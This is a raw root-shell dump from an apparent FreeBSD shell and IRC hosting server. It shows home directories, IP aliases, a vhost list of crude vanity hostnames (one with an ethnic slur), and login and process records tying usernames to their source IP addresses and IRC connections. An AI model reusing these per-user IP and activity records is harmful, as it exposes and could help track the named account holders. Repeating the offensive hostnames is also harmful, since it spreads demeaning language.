drwxr-xr-x 2 omen omen 512 Nov 24 2008 omen/
drwxr-xr-x 5 omgwtf omgwtf 512 Apr 27 03:17 omgwtf/
drwxr-xr-x 5 owine owine 512 Apr 21 2008 owine/
drwxr-xr-x 6 own3d own3d 512 Oct 15 2008 own3d/
drwxr-xr-x 5 paleride paleride 512 Jan 27 17:55 paleride/
drwxr-xr-x 2 pbx pbx 512 Dec 28 14:22 pbx/
drwxr-xr-x 2 percott1 percott1 512 Jun 24 2008 percott1/
drwxr-xr-x 8 pimpinjg pimpinjg 512 Jun 23 07:20 pimpinjg/
drwxr-xr-x 4 poolboy poolboy 512 Aug 29 2007 poolboy/
drwxr-xr-x 3 prodigy prodigy 512 May 30 2008 prodigy/
drwxr-xr-x 3 psycoz psycoz 512 Jun 7 17:01 psycoz/
drwxr-xr-x 2 qberto qberto 512 Mar 17 12:09 qberto/
drwxr-xr-x 7 qfx qfx 512 Feb 17 04:54 qfx/
drwxr-xr-x 4 quinn quinn 512 Aug 10 2007 quinn/
drwxr-xr-x 5 reaper90 reaper90 512 Dec 2 2007 reaper90/
drwxr-xr-x 22 redrum redrum 1024 Jun 9 12:49 redrum/
drwxr-xr-x 5 reznik reznik 512 Apr 11 2008 reznik/
drwxr-xr-x 4 rice21 rice21 512 Dec 17 2008 rice21/
drwxr-xr-x 4 rikt rikt 512 Feb 17 06:27 rikt/
drwxr-xr-x 5 romeo romeo 512 Jun 20 02:58 romeo/
drwxr-xr-x 7 roodyk roodyk 512 Apr 26 14:04 roodyk/
drwxr-xr-x 3 sacred sacred 512 Jun 1 2007 sacred/
drwxr-xr-x 3 safety safety 512 Feb 15 2008 safety/
drwxr-xr-x 2 sakik1 sakik1 512 Dec 3 2008 sakik1/
drwxr-xr-x 2 sal sal 512 Feb 16 17:17 sal/
drwxr-xr-x 5 schlomer schlomer 512 Aug 24 2007 schlomer/
drwxr-xr-x 7 scouse scouse 1536 Nov 5 2008 scouse/
drwxr-xr-x 5 sharpie sharpie 512 Apr 13 2007 sharpie/
drwxr-xr-x 5 shoes shoes 512 Mar 7 22:32 shoes/
drwxr-xr-x 2 silver15 silver15 512 Mar 25 2008 silver15/
drwxr-xr-x 3 simonbh simonbh 512 Aug 9 2007 simonbh/
drwxr-xr-x 9 sinistro sinistro 512 Oct 5 2007 sinistro/
drwxr-xr-x 2 skit skit 512 Apr 12 2007 skit/
drwxr-xr-x 6 skypilot skypilot 512 Nov 7 2008 skypilot/
drwxr-xr-x 5 smash smash 512 Jun 22 01:29 smash/
drwxr-xr-x 6 sqd sqd 512 May 7 20:56 sqd/
drwxr-xr-x 3 ssaws ssaws 512 Feb 3 23:20 ssaws/
drwxr-xr-x 4 ste ste 512 Jun 15 12:29 ste/
drwxr-xr-x 5 subkult subkult 512 Feb 3 11:59 subkult/
drwxr-xr-x 7 sysc sysc 512 Jun 11 10:27 sysc/
drwxr-xr-x 9 tarawa tarawa 512 May 26 10:51 tarawa/
drwxr-xr-x 3 tea tea 512 Mar 16 2008 tea/
drwxr-xr-x 5 techi3 techi3 512 Aug 29 2007 techi3/
drwxr-xr-x 5 timgor timgor 1024 Sep 3 2007 timgor/
drwxr-xr-x 3 tlm tlm 512 May 1 2007 tlm/
drwxr-xr-x 7 vamp vamp 1024 Nov 20 2007 vamp/
drwxr-xr-x 2 vietnigh vietnigh 512 Mar 8 15:31 vietnigh/
drwxr-xr-x 3 visage visage 512 Mar 13 15:59 visage/
drwxr-xr-x 4 vitalrbj vitalrbj 512 May 15 2007 vitalrbj/
drwxr-xr-x 3 vividbreeze vividbreeze 512 May 15 2005 vividbreeze/
drwxr-xr-x 2 voxitize voxitize 512 Aug 18 2008 voxitize/
drwxr-xr-x 5 warlordz warlordz 512 Aug 20 2007 warlordz/
drwxr-xr-x 3 wchan21 wchan21 512 Dec 15 2008 wchan21/
drwxr-xr-x 4 wolf wolf 512 Aug 28 2008 wolf/
drwxr-xr-x 2 xavi xavi 512 Feb 1 16:56 xavi/
drwxr-xr-x 3 xckx xckx 512 Oct 4 2007 xckx/
drwxr-xr-x 4 xkelsx xkelsx 512 Dec 16 2008 xkelsx/
drwxr-xr-x 5 y2j y2j 512 May 15 08:42 y2j/
drwxr-xr-x 13 yaquis yaquis 1024 Jun 11 14:32 yaquis/
drwxr-xr-x 8 zeepysea zeepysea 512 Oct 21 2008 zeepysea/
drwxr-xr-x 6 zenchi zenchi 512 Nov 29 2007 zenchi/
drwxr-xr-x 4 zime zime 512 Feb 15 2008 zime/
drwxr-xr-x 3 zoo zoo 512 Apr 14 2007 zoo/
[root@velocity:/home]#
[root@velocity:/home]# ifconfig
bge0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
options=1b<RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING>
inet 72.20.3.98 netmask 0xfffffffc broadcast 72.20.3.99
inet 72.20.28.193 netmask 0xffffffff broadcast 72.20.28.193
inet 72.20.28.194 netmask 0xffffffff broadcast 72.20.28.194
inet 72.20.28.195 netmask 0xffffffff broadcast 72.20.28.195
inet 72.20.28.196 netmask 0xffffffff broadcast 72.20.28.196
inet 72.20.28.197 netmask 0xffffffff broadcast 72.20.28.197
inet 72.20.28.198 netmask 0xffffffff broadcast 72.20.28.198
inet 72.20.28.199 netmask 0xffffffff broadcast 72.20.28.199
inet 72.20.28.200 netmask 0xffffffff broadcast 72.20.28.200
inet 72.20.28.201 netmask 0xffffffff broadcast 72.20.28.201
inet 72.20.28.202 netmask 0xffffffff broadcast 72.20.28.202
inet 72.20.28.203 netmask 0xffffffff broadcast 72.20.28.203
inet 72.20.28.204 netmask 0xffffffff broadcast 72.20.28.204
inet 72.20.28.205 netmask 0xffffffff broadcast 72.20.28.205
inet 72.20.28.206 netmask 0xffffffff broadcast 72.20.28.206
inet 72.20.28.207 netmask 0xffffffff broadcast 72.20.28.207
inet 72.20.28.208 netmask 0xffffffff broadcast 72.20.28.208
inet 72.20.28.209 netmask 0xffffffff broadcast 72.20.28.209
inet 72.20.28.210 netmask 0xffffffff broadcast 72.20.28.210
inet 72.20.28.211 netmask 0xffffffff broadcast 72.20.28.211
inet 72.20.28.212 netmask 0xffffffff broadcast 72.20.28.212
inet 72.20.28.213 netmask 0xffffffff broadcast 72.20.28.213
inet 72.20.28.214 netmask 0xffffffff broadcast 72.20.28.214
inet 72.20.28.215 netmask 0xffffffff broadcast 72.20.28.215
inet 72.20.28.216 netmask 0xffffffff broadcast 72.20.28.216
inet 72.20.28.217 netmask 0xffffffff broadcast 72.20.28.217
inet 72.20.28.218 netmask 0xffffffff broadcast 72.20.28.218
inet 72.20.28.219 netmask 0xffffffff broadcast 72.20.28.219
inet 72.20.28.220 netmask 0xffffffff broadcast 72.20.28.220
inet 72.20.28.221 netmask 0xffffffff broadcast 72.20.28.221
inet 72.20.28.222 netmask 0xffffffff broadcast 72.20.28.222
inet 72.20.28.223 netmask 0xffffffff broadcast 72.20.28.223
inet 72.20.28.224 netmask 0xffffffff broadcast 72.20.28.224
inet 72.20.28.225 netmask 0xffffffff broadcast 72.20.28.225
inet 72.20.28.226 netmask 0xffffffff broadcast 72.20.28.226
inet 72.20.28.227 netmask 0xffffffff broadcast 72.20.28.227
inet 72.20.28.228 netmask 0xffffffff broadcast 72.20.28.228
inet 72.20.28.229 netmask 0xffffffff broadcast 72.20.28.229
inet 72.20.28.230 netmask 0xffffffff broadcast 72.20.28.230
inet 72.20.28.231 netmask 0xffffffff broadcast 72.20.28.231
inet 72.20.28.232 netmask 0xffffffff broadcast 72.20.28.232
inet 72.20.28.233 netmask 0xffffffff broadcast 72.20.28.233
inet 72.20.28.234 netmask 0xffffffff broadcast 72.20.28.234
inet 72.20.28.235 netmask 0xffffffff broadcast 72.20.28.235
inet 72.20.28.236 netmask 0xffffffff broadcast 72.20.28.236
inet 72.20.28.237 netmask 0xffffffff broadcast 72.20.28.237
inet 72.20.28.238 netmask 0xffffffff broadcast 72.20.28.238
inet 72.20.28.239 netmask 0xffffffff broadcast 72.20.28.239
inet 72.20.28.240 netmask 0xffffffff broadcast 72.20.28.240
inet 72.20.28.241 netmask 0xffffffff broadcast 72.20.28.241
inet 72.20.28.242 netmask 0xffffffff broadcast 72.20.28.242
inet 72.20.28.243 netmask 0xffffffff broadcast 72.20.28.243
inet 72.20.28.244 netmask 0xffffffff broadcast 72.20.28.244
inet 72.20.28.245 netmask 0xffffffff broadcast 72.20.28.245
inet 72.20.28.246 netmask 0xffffffff broadcast 72.20.28.246
inet 72.20.28.247 netmask 0xffffffff broadcast 72.20.28.247
inet 72.20.28.248 netmask 0xffffffff broadcast 72.20.28.248
inet 72.20.28.249 netmask 0xffffffff broadcast 72.20.28.249
inet 72.20.28.250 netmask 0xffffffff broadcast 72.20.28.250
inet 72.20.28.251 netmask 0xffffffff broadcast 72.20.28.251
inet 72.20.28.252 netmask 0xffffffff broadcast 72.20.28.252
inet 72.20.28.253 netmask 0xffffffff broadcast 72.20.28.253
inet 72.20.28.254 netmask 0xffffffff broadcast 72.20.28.254
ether 00:11:11:cc:09:63
media: Ethernet 10baseT/UTP <full-duplex>
status: active
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
inet6 fe80::1%lo0 prefixlen 64 scopeid 0x2
inet6 ::1 prefixlen 128
inet 127.0.0.1 netmask 0xff000000
[root@velocity:/home]#
[root@velocity:/usr/home]# cat /bin/vhosts
#!/usr/local/bin/bash
echo "
_ __/ /_ ____ _____/ /______
| | / / __ \/ __ \/ ___/ __/ ___/
| |/ / / / / /_/ (__ ) /_(__ )
|___/_/ /_/\____/____/\__/____/
www.vitalspeeds.com/vhosts
72.20.3.98 -\> .
72.20.28.193 -\> scaring.us.
72.20.28.194 -\> .
72.20.28.195 -\> George.W.Bush.is.scaring.us.
72.20.28.196 -\> l33t.hax0rs.are.scaring.us.
72.20.28.197 -\> your.mom.is.scaring.us.
72.20.28.198 -\> irc.isidling.net.
72.20.28.199 -\> everyone.isalways.idling.net.
72.20.28.200 -\> just.idling.net.
72.20.28.201 -\> the.mpaa.keeps.scaring.us.
72.20.28.202 -\> the.riaa.keeps.scaring.us.
72.20.28.203 -\> defaultxbe.com.
72.20.28.204 -\> ownage.net.
72.20.28.205 -\> absolute.ownage.net.
72.20.28.206 -\> complete.ownage.net.
72.20.28.207 -\> is.the.godofgods.net.
72.20.28.208 -\> fatblunts.com.
72.20.28.209 -\> will.work.for.fatblunts.com.
72.20.28.210 -\> smokes.fatblunts.com.
72.20.28.211 -\> rolls.fatblunts.com.
72.20.28.212 -\> fuckdapolice.com.
72.20.28.213 -\> killed.my.wife.and.said.fuckdapolice.com.
72.20.28.214 -\> owned.nasa.and.said.fuckdapolice.com.
72.20.28.215 -\> playah.org.
72.20.28.216 -\> big.time.playah.org.
72.20.28.217 -\> still.a.playah.org.
72.20.28.218 -\> the.original.playah.org.
72.20.28.219 -\> shitsngiggles.net.
72.20.28.220 -\> packeted.gov.for.shitsngiggles.net.
72.20.28.221 -\> us-govt.info.
72.20.28.222 -\> has.topsecret.us-govt.info.
72.20.28.223 -\> steals.us-govt.info.
72.20.28.224 -\> packets.the.us-govt.info.
72.20.28.225 -\> oblivion.globalwar.net.
72.20.28.226 -\> started.a.globalwar.net.
72.20.28.227 -\> irc.sith-net.com.
72.20.28.228 -\> i.am.away.idling.net.
72.20.28.229 -\> you.got.schooled.org.
72.20.28.230 -\> wonders.why.arabs.like.to.fuck.withthe.us.
72.20.28.231 -\> dont.fuck.withthe.us.
72.20.28.232 -\> stole.your-ip.info.
72.20.28.233 -\> has.your-ip.info.
72.20.28.234 -\> overflo.ws.
72.20.28.235 -\> your.mom.needs.a.tampon.before.she.overflo.ws.
72.20.28.236 -\> buffer.overflo.ws.
72.20.28.237 -\> got.hacked.by.buffer.overflo.ws.
72.20.28.238 -\> the.toilet.overflo.ws.
72.20.28.239 -\> i.made.the.hoover.dam.overflo.ws.
72.20.28.240 -\> i.am.teh.antidr.ug.
72.20.28.241 -\> irc.cheazey.net.
72.20.28.242 -\> staff.vitalspeeds.com.
72.20.28.243 -\> oper.idlenetworks.net.
72.20.28.244 -\> .
72.20.28.245 -\> .
72.20.28.246 -\> .
72.20.28.247 -\> .
72.20.28.248 -\> .
72.20.28.249 -\> .
72.20.28.250 -\> .
72.20.28.251 -\> .
72.20.28.252 -\> .
72.20.28.253 -\> cyberia.is.scaring.us.
72.20.28.254 -\> anarchy.fuckdapolice.com.
"
[root@velocity:~]# last root
wtmp begins Mon Jun 1 06:20:11 CDT 2009
[root@velocity:~]# last romeo
romeo ttypg 188.49.118.210 Wed Jun 17 18:35 - 18:35 (00:00)
wtmp begins Mon Jun 1 06:20:11 CDT 2009
[root@velocity:~]# last pimpinjg
pimpinjg ttyp2 cpe-76-175-20-18 Wed Jun 24 07:29 - 07:51 (00:22)
pimpinjg ttyp2 cpe-76-175-20-18 Wed Jun 24 05:47 - 06:44 (00:56)
pimpinjg ttyp3 cpe-76-175-20-18 Wed Jun 24 05:41 - 05:46 (00:05)
pimpinjg ttyp3 cpe-76-175-20-18 Wed Jun 24 05:40 - 05:41 (00:00)
pimpinjg ttyp1 cpe-76-175-20-18 Wed Jun 24 05:30 - 05:41 (00:10)
pimpinjg ttyp1 cpe-76-175-20-18 Wed Jun 24 04:32 - 04:35 (00:02)
pimpinjg ttyp3 cpe-76-175-20-18 Tue Jun 23 20:54 - 20:54 (00:00)
pimpinjg ttypf cpe-76-175-20-18 Tue Jun 23 08:51 - 08:51 (00:00)
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 08:47 - 20:53 (12:06)
pimpinjg ttypf cpe-76-175-20-18 Tue Jun 23 08:37 - 08:42 (00:05)
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 08:37 - 08:43 (00:06)
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 08:36 - 08:36 (00:00)
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 08:36 - 08:36 (00:00)
pimpinjg ttypf cpe-76-175-20-18 Tue Jun 23 07:19 - 08:32 (01:12)
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 07:15 - 08:36 (01:20)
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 07:12 - 07:13 (00:01)
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 07:11 - 07:12 (00:00)
pimpinjg ttypf cpe-76-175-20-18 Tue Jun 23 05:20 - 05:20 (00:00)
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 04:59 - 07:10 (02:10)
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 03:43 - 04:25 (00:42)
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 03:10 - 03:10 (00:00)
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 02:52 - 02:59 (00:07)
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 02:37 - 02:38 (00:01)
pimpinjg ttypf cpe-76-175-20-18 Tue Jun 23 01:26 - 01:28 (00:01)
pimpinjg ttypf cpe-76-175-20-18 Tue Jun 23 01:16 - 01:17 (00:01)
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 01:15 - 01:43 (00:28)
pimpinjg ttypf cpe-76-175-20-18 Tue Jun 23 01:11 - 01:14 (00:02)
pimpinjg ttypf cpe-76-175-20-18 Tue Jun 23 01:02 - 01:07 (00:04)
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 00:45 - 01:14 (00:28)
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 21:14 - 22:05 (00:50)
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 21:07 - 21:14 (00:07)
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 19:23 - 19:54 (00:31)
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 18:36 - 18:36 (00:00)
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 17:40 - 18:24 (00:43)
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 17:12 - 17:37 (00:24)
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 09:20 - 09:21 (00:01)
pimpinjg ttype cpe-76-175-20-18 Mon Jun 22 08:45 - 09:19 (00:33)
pimpinjg ttype cpe-76-175-20-18 Mon Jun 22 08:37 - 08:40 (00:02)
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 08:30 - 08:49 (00:19)
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 08:20 - 08:26 (00:05)
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 08:17 - 08:18 (00:01)
pimpinjg ttype cpe-76-175-20-18 Mon Jun 22 08:03 - 08:12 (00:08)
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 08:01 - 08:03 (00:02)
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 07:55 - 08:00 (00:04)
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 07:43 - 07:55 (00:11)
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 04:09 - 04:12 (00:03)
pimpinjg ttypf cpe-76-175-20-18 Mon Jun 22 03:05 - 03:06 (00:00)
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 02:31 - 02:33 (00:01)
pimpinjg ttypd cpe-76-175-20-18 Sun Jun 21 20:58 - 21:48 (00:50)
pimpinjg ttypd cpe-76-175-20-18 Sun Jun 21 20:35 - 20:51 (00:16)
pimpinjg ttypd cpe-76-175-20-18 Sun Jun 21 20:07 - 20:23 (00:16)
pimpinjg ttypd cpe-76-175-20-18 Sun Jun 21 19:51 - 19:53 (00:01)
pimpinjg ttypd cpe-76-175-20-18 Sun Jun 21 17:22 - 17:25 (00:03)
pimpinjg ttypd cpe-76-175-20-18 Sun Jun 21 17:02 - 17:08 (00:06)
pimpinjg ttypd cpe-76-175-20-18 Sat Jun 20 15:18 - 15:29 (00:10)
pimpinjg ttypd cpe-76-175-20-18 Sat Jun 20 02:13 - 02:14 (00:00)
pimpinjg ttypd 76.175.20.182 Fri Jun 19 20:41 - 20:43 (00:01)
pimpinjg ttypf cpe-76-175-20-18 Thu Jun 18 22:53 - 22:57 (00:04)
pimpinjg ttyp2 cpe-76-175-20-18 Thu Jun 18 05:11 - 05:12 (00:01)
pimpinjg ttyp2 cpe-76-175-20-18 Thu Jun 18 04:53 - 05:07 (00:14)
pimpinjg ttyp2 cpe-76-175-20-18 Thu Jun 18 04:42 - 04:42 (00:00)
pimpinjg ttypd cpe-76-175-20-18 Thu Jun 18 04:28 - 04:41 (00:12)
pimpinjg ttypd cpe-76-175-20-18 Thu Jun 18 02:03 - 02:44 (00:41)
pimpinjg ttypd cpe-76-175-20-18 Wed Jun 17 21:10 - 21:52 (00:42)
pimpinjg ttype cpe-76-175-20-18 Wed Jun 17 19:37 - 19:37 (00:00)
pimpinjg ttype cpe-76-175-20-18 Wed Jun 17 19:30 - 19:37 (00:06)
pimpinjg ttype cpe-76-175-20-18 Wed Jun 17 19:29 - 19:30 (00:00)
pimpinjg ttype cpe-76-175-20-18 Wed Jun 17 19:27 - 19:29 (00:01)
pimpinjg ttype cpe-76-175-20-18 Wed Jun 17 19:27 - 19:27 (00:00)
pimpinjg ttype cpe-76-175-20-18 Wed Jun 17 19:25 - 19:26 (00:00)
pimpinjg ttype cpe-76-175-20-18 Wed Jun 17 19:23 - 19:25 (00:01)
wtmp begins Mon Jun 1 06:20:11 CDT 2009
[root@velocity:~]#
[root@velocity:~]# ps -aux | grep romeo
root 60582 0.0 0.2 5400 2036 ?? Is 3:32AM 0:00.16 sshd: romeo [priv] (sshd)
romeo 60584 0.0 0.2 5384 2088 ?? S 3:32AM 0:01.47 sshd: (sshd)
romeo 51236 0.0 0.2 3268 1836 p0 Is 11:50PM 0:00.03 /usr/local/bin/bash
romeo 51241 0.0 0.6 9296 6136 p0 S+ 11:50PM 0:10.95 irssi -h absolute.ownage.net
romeo 60586 0.0 0.2 3244 1900 p2 Is 3:32AM 0:00.04 -bash (bash)
romeo 62761 0.0 0.1 2040 1448 p2 S+ 4:25AM 0:00.04 screen -r
[root@velocity:~]# lsof -i -n | grep romeo
irssi 51241 romeo 3u IPv4 0xca130740 0t0 TCP 72.20.28.205:61626->71.6.199.68:ircd (ESTABLISHED)
irssi 51241 romeo 4u IPv4 0xc58c4740 0t0 TCP 72.20.28.205:53292->66.225.223.70:ircd (ESTABLISHED)
irssi 51241 romeo 7u IPv4 0xca04a1d0 0t0 TCP 72.20.28.205:62094->94.102.58.212:ircd (ESTABLISHED)
sshd 60584 romeo 3u IPv4 0xc9e971d0 0t0 TCP 72.20.28.248:ssh->188.49.23.137:28098 (ESTABLISHED)
[root@velocity:~]#
root@velocity:/var/run]# ps -auxwww
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
root 10 83.0 0.0 0 8 ?? RL 27Jan08 534762:26.98 [idle]
lyhne1 85085 11.3 0.3 10700 3096 ?? S 11May09 1274:26.14 /home/lyhne1/services/services
root 0 0.0 0.0 0 0 ?? WLs 27Jan08 0:00.08 [swapper]
root 1 0.0 0.0 772 80 ?? ILs 27Jan08 21:20.52 /sbin/init --
root 2 0.0 0.0 0 8 ?? DL 27Jan08 38:47.98 [g_event]
root 3 0.0 0.0 0 8 ?? DL 27Jan08 187:53.55 [g_up]
root 4 0.0 0.0 0 8 ?? DL 27Jan08 141:20.71 [g_down]
root 5 0.0 0.0 0 8 ?? DL 27Jan08 0:00.00 [kqueue taskq]
root 6 0.0 0.0 0 8 ?? DL 27Jan08 0:00.01 [thread taskq]
root 7 0.0 0.0 0 8 ?? DL 27Jan08 0:00.00 [acpi_task_0]
root 8 0.0 0.0 0 8 ?? DL 27Jan08 0:00.00 [acpi_task_1]
root 9 0.0 0.0 0 8 ?? DL 27Jan08 0:00.00 [acpi_task_2]
root 11 0.0 0.0 0 8 ?? WL 27Jan08 3371:26.93 [swi4: clock sio]
root 12 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [swi3: vm]
root 13 0.0 0.0 0 8 ?? WL 27Jan08 6365:16.77 [swi1: net]
root 14 0.0 0.0 0 8 ?? DL 27Jan08 557:44.26 [yarrow]
root 15 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [swi6: task queue]
root 16 0.0 0.0 0 8 ?? WL 27Jan08 0:00.01 [swi6: Giant taskq]
root 17 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [swi5: +]
root 18 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [swi2: cambio]
root 19 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [irq9: acpi0]
root 20 0.0 0.0 0 8 ?? WL 27Jan08 5058:47.37 [irq16: bge0]
root 21 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [irq21: uhci0 ehci0]
root 22 0.0 0.0 0 8 ?? DL 27Jan08 0:02.22 [usb0]
root 23 0.0 0.0 0 8 ?? DL 27Jan08 0:00.00 [usbtask]
root 24 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [irq22: uhci1]
root 25 0.0 0.0 0 8 ?? DL 27Jan08 0:02.68 [usb1]
root 26 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [irq18: uhci2]
root 27 0.0 0.0 0 8 ?? DL 27Jan08 0:01.99 [usb2]
root 28 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [irq23: uhci3]
root 29 0.0 0.0 0 8 ?? DL 27Jan08 0:02.09 [usb3]
root 30 0.0 0.0 0 8 ?? DL 27Jan08 0:02.34 [usb4]
root 31 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [irq14: ata0]
root 32 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [irq15: ata1]
root 33 0.0 0.0 0 8 ?? WL 27Jan08 149:12.28 [irq20: atapci1]
root 34 0.0 0.0 0 8 ?? WL 27Jan08 0:00.60 [irq1: atkbd0]
root 35 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [swi0: sio]
root 36 0.0 0.0 0 8 ?? DL 27Jan08 15:56.90 [pagedaemon]
root 37 0.0 0.0 0 8 ?? DL 27Jan08 0:01.89 [vmdaemon]
root 38 0.0 0.0 0 8 ?? DL 27Jan08 98:08.61 [pagezero]
root 39 0.0 0.0 0 8 ?? DL 27Jan08 3:59.11 [bufdaemon]
root 40 0.0 0.0 0 8 ?? DL 27Jan08 519:04.35 [syncer]
root 41 0.0 0.0 0 8 ?? DL 27Jan08 5:03.46 [vnlru]
root 42 0.0 0.0 0 8 ?? DL 27Jan08 56:44.12 [softdepflush]
root 43 0.0 0.0 0 8 ?? DL 27Jan08 96:57.63 [schedcpu]
root 753 0.0 0.0 528 0 ?? IWs - 0:00.00 /sbin/devd
root 808 0.0 0.0 1376 368 ?? Ss 27Jan08 29:30.11 /usr/sbin/syslogd -s
root 905 0.0 0.0 1288 108 ?? Ss 27Jan08 0:38.65 /usr/sbin/usbd
nobody 921 0.0 0.1 2368 644 ?? Ss 27Jan08 10:21.51 proftpd: (accepting connections) (proftpd)
root 973 0.0 0.0 1444 344 ?? Is 27Jan08 9:25.16 /usr/sbin/cron -s
nodex 1211 0.0 0.1 4892 620 ?? S 27Jan08 2:16.48 ./services
nodex 1219 0.0 0.1 3408 796 ?? S 27Jan08 20:22.77 ircd: irc.nodexirc.net (ircd)
crazyl 1230 0.0 0.2 3484 1896 ?? S 27Jan08 62:45.21 ./eggdrop ApocBot.conf (eggdrop-1.6.18)
crazyl 1241 0.0 0.2 3952 2400 ?? S 27Jan08 93:52.56 ./eggdrop Hibben.conf (eggdrop-1.6.18)
crazyl 1248 0.0 0.2 4128 2352 ?? S 27Jan08 96:56.14 ./eggdrop CLBot.conf (eggdrop-1.6.18)
root 2937 0.0 0.0 1408 204 ?? Is 27Jan08 2:15.57 oidentd
ioplex 4479 0.0 0.2 5228 1608 ?? Ss 10Jun09 2:15.27 ./psybnc conf
roodyk 7496 0.0 0.0 4512 496 ?? Ss 26Apr09 0:34.85 ./sbnc
roodyk 7497 0.0 0.2 7760 2416 ?? S 26Apr09 2:06.67 ./sbnc --rpc-child
bluewish 8293 0.0 0.1 1580 524 ?? Ss 31Mar09 3:18.90 ./energymech
skypilot 11073 0.0 0.0 1508 0 ?? IWs - 0:00.00 ./bnc
ste 12145 0.0 0.2 3936 2368 ?? Ss 15Jun09 6:32.39 /usr/home/ste/bsd mob
ste 12182 0.0 0.2 4960 2556 ?? Ss 15Jun09 7:31.60 /usr/home/ste/bsd player
lordy 12679 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
lordy 12680 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
lordy 12682 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
lordy 12683 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
lordy 12684 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
lordy 12685 0.0 0.0 0 0 ?? Z 13Jun09 0:00.01 <defunct>
lordy 12686 0.0 0.0 0 0 ?? Z 13Jun09 0:00.01 <defunct>
lordy 12687 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
lordy 12689 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
lordy 12690 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
lordy 12691 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
lordy 12692 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
lordy 12695 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
lordy 12696 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
lordy 12697 0.0 0.0 0 0 ?? Z 13Jun09 0:00.01 <defunct>
lordy 12701 0.0 0.0 0 0 ?? Z 13Jun09 0:00.01 <defunct>
crrj13 15843 0.0 0.3 5508 2696 ?? S 28Apr09 3:57.42 ircd: lambda.bitsjointirc.net (ircd)
daali 18199 0.0 0.0 2888 0 ?? IWs - 0:00.00 ./bnc bnc.conf
daali 18620 0.0 0.0 2716 0 ?? IWs - 0:00.00 ./bnc bnc.conf
scouse 19191 0.0 0.1 2956 1152 ?? S 27Nov08 825:22.21 ircd: irc.toughsociety.com (ircd)
scouse 19383 0.0 0.1 7296 676 ?? S 27Nov08 0:46.99 ./services -logchan
root 21928 0.0 0.2 5476 2020 ?? Is 9:10PM 0:00.07 sshd: (sshd)
root 22109 0.0 0.2 5344 2024 ?? Ss 9:15PM 0:00.09 sshd: (sshd)
blotch 22806 0.0 1.2 18352 12200 ?? Ss 10Dec08 4616:08.79 /usr/home/blotch/inspircd/bin/inspircd
shoes 25037 0.0 0.2 5092 2132 ?? S 23Sep08 156:12.96 ./eggdrop ./bot.conf (eggdrop-1.6.19)
shoes 25039 0.0 0.2 5152 2160 ?? S 23Sep08 153:40.81 ./eggdrop ./bot.conf (eggdrop-1.6.19)
crazyl 25232 0.0 0.3 4344 2676 ?? S 31Jan09 28:34.31 ./eggdrop cx4storm.conf (eggdrop-1.6.18)
narcissu 26686 0.0 0.1 4740 1452 ?? S 11Mar08 22:41.05 ircd: beta.pseud0.net (ircd)
smash 26960 0.0 0.2 12128 2032 ?? Ss 9Nov08 147:51.60 /usr/home/smash/wraith/wraith iridium
blake96 27902 0.0 0.2 3344 1924 ?? S 8Nov08 23:08.58 ./eggdrop eggdrop.conf (eggdrop-1.6.19)
lyhne1 29482 0.0 0.1 1448 700 ?? S 2Jan09 134:02.80 ./bopm
chrirc 33440 0.0 0.1 3520 776 ?? S 12Jun08 15:34.94 ircd: irc.ChristianIRC.net (ircd)
yaquis 43784 0.0 0.1 1520 736 ?? Ss 12Jun09 0:02.72 ./bnc
